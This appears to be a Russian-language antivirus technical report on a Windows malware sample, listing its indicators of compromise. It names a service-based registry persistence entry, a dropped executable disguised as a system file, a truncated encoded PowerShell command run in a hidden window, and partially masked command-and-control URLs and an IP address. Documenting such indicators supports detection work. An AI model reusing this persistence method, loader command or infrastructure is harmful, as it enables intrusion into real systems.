Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\actxprxy] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\actxprxy] 'ImagePath' = '"%WINDIR%\SysWOW64\KBDDA\actxprxy.exe"'
- 'actxprxy' "%WINDIR%\SysWOW64\KBDDA\actxprxy.exe"
- 'actxprxy' %WINDIR%\SysWOW64\KBDDA\actxprxy.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABGADIAZAByADQAdAB0AD0AKAAoACcAUgBwADQAJwArACcAdwA1ACcAKQArACcAbwAnACsAJwBiACcAKQA7ACQARABjADMAeQBnAHgAbgA9ACQARgB3AGkANQAzAGkAdQAgACsAIABbAGMAaABhAHIAXQAoADEAIAArACAAMQ...
- %HOMEPATH%\bh2dez5\obl3adb\rmrfi2g4_.exe
- %WINDIR%\syswow64\kbdda\actxprxy.exe
- %HOMEPATH%\bh2dez5\obl3adb\rmrfi2g4_.exe в %WINDIR%\syswow64\kbdda\actxprxy.exe
- '22#.#47.142.214':80
- http://th####seofpeace.org/cgi-bin/NZdfyylt/
- http://wa###nancial.ca/wp-content/3H9P2P9qn/
- http://22#.#47.142.214/S0JUJUtM/K7ByCSIVAEQO8U/DGjXIi2K9Mfasxw4An/0Hw2cCGu/AsLPLKnsMx8XbKhs1/
- DNS ASK th####seofpeace.org
- DNS ASK wa###nancial.ca
- '%HOMEPATH%\bh2dez5\obl3adb\rmrfi2g4_.exe'
- '%WINDIR%\syswow64\kbdda\actxprxy.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABGADIAZAByADQAdAB0AD0AKAAoACcAUgBwADQAJwArACcAdwA1ACcAKQArACcAbwAnACsAJwBiACcAKQA7ACQARABjADMAeQBnAHgAbgA9ACQARgB3AGkANQAzAGkAdQAgACsAIABbAGMAaABhAHIAXQAoADEAIAArACAAMQ...' (со скрытым окном)